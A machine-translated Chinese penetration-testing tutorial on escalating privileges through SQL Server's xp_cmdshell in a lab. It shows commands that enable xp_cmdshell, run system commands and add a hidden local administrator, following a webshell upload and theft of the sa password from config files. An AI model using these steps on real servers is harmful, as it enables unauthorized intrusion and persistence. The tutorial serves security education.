当前位置:网站首页>110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
2022-07-07 11:56:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows Sqlserver xp_cmdshell Stored procedure Authorization
1、XP_CMDSHELL Background of power raising :
If the database used in the website is sqlserver So if you find sa Password , Can be opened xp_cmdshell stored procedure , With sqlserver Execute system commands as . But not necessarily the system permissions , It also depends on the administrator installing at the beginning sqlserver Permission settings for .
2、XP_CMDSHELL Relevant concepts :
(1)xp_cmdshell stored procedure 【 The stored procedure is : One or more that have been precompiled into an executable procedure SQL Collection of statements 】, It is used to execute this machine cmd Ordered , System login required sa jurisdiction . By default ,sql server2005/2008 After installation ,xp_cmdshell Stored procedures are disabled , If you want to use it , You can turn on :
Exec sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;`
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure ‘show advanced options’,1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Reconfiguration |
3 | EXEC sp_configure ‘xp_cmdshell’,1; | # Enable xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Reconfiguration |
(2) Execute system command format :
Serial number | command | notes |
---|---|---|
1 | Exec master.dbo.xp_cmdshell ‘whoami’ | # View the current user |
2 | Exec master.dbo.xp_cmdshell ‘net user’ | # View all users |
3 | Exec master.dbo.xp_cmdshell ‘systeminfo’ | # see OS Information |
4 | Exec master.dbo.xp_cmdshell ‘net user test 123 /add & net localgroup administrators test /add’ | # Add administrator group user |
(3) Disable it after use :Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure ‘show advanced options’,1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Reconfiguration |
3 | EXEC sp_configure ‘xp_cmdshell’,0; | # Ban xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Reconfiguration |
3、XP_CMDSHELL The actual battle of raising power :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(3) Target link :
URL:http://target_sys.com/upload.php
(3) Experimental process :
First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia
【 The above process is a little 】 The following is the right raising process :
The second step : Connect up.aspx Malaysia 【 The password for admin】, And click [File Manager] File management module , Search for sqlserver The account number and password of
Connecting Malaysia :
sqlserver The general storage location of the connection data :web.config、config.asp、conn.aspx、database.aspx, But the environment is really sidelined (www.demo1.com) Under the index.aspx Memory stores as User password :123456
The third step : Click on [DataBase] Database module , Use the just obtained sa Account connection mssql, Simultaneous discovery SQL SERVER Version is 2008
xp_cmdshell Stored procedures are used to execute native cmd Ordered , System login required sa jurisdiction
Step four :SQLExec Select from the drop-down box Add xp_cmdshell(SQL2005) This option , Turn on xp_cmdshell stored procedure
Step five : Use the just launched xp_cmdshell stored procedure , With sqlserver To execute some system commands as
Because viewing the current permission is also an ordinary user , So you can only execute some basic commands , You can also upload the overflow right lifting tool Then improve the permissions of the current user .
边栏推荐
- Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
- How to connect 5V serial port to 3.3V MCU serial port?
- Present pod information to the container through environment variables
- .NET MAUI 性能提升
- 一起探索云服务之云数据库
- Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
- Excel公式知多少?
- . Net Maui performance improvement
- [question] Compilation Principle
- 聊聊SOC启动(六)uboot启动流程二
猜你喜欢
The annual salary of general test is 15W, and the annual salary of test and development is 30w+. What is the difference between the two?
超标量处理器设计 姚永斌 第8章 指令发射 摘录
About how to install mysql8.0 on the cloud server (Tencent cloud here) and enable local remote connection
一起探索云服务之云数据库
powershell cs-UTF-16LE编码上线
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
Flet教程之 17 Card卡片组件 基础入门(教程含源码)
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
La voie du succès de la R & D des entreprises Internet à l’échelle des milliers de personnes
随机推荐
MySQL安装常见报错处理大全
sql里,我想设置外键,为什么出现这个问题
The Oracle message permission under the local Navicat connection liunx is insufficient
Cmu15445 (fall 2019) project 2 - hash table details
How to connect 5V serial port to 3.3V MCU serial port?
SwiftUI Swift 内功之 Swift 中使用不透明类型的 5 个技巧
R language uses image of magick package_ Mosaic functions and images_ The flatten function stacks multiple pictures together to form a stack layers on top of each other
Talk about SOC startup (11) kernel initialization
《通信软件开发与应用》课程结业报告
R语言可视化分面图、假设检验、多变量分组t检验、可视化多变量分组分面箱图(faceting boxplot)并添加显著性水平、添加抖动数据点(jitter points)
[filter tracking] comparison between EKF and UKF based on MATLAB extended Kalman filter [including Matlab source code 1933]
Rationaldmis2022 advanced programming macro program
R語言使用magick包的image_mosaic函數和image_flatten函數把多張圖片堆疊在一起形成堆疊組合圖像(Stack layers on top of each other)
【系统设计】指标监控和告警系统
sink 消费 到 MySQL, 数据库表里面已经设置了 自增主键, flink 里面,如何 操作?
Half of the people don't know the difference between for and foreach???
STM32入门开发 采用IIC硬件时序读写AT24C08(EEPROM)
通过环境变量将 Pod 信息呈现给容器
一起探索云服务之云数据库
In depth learning autumn recruitment interview questions collection (1)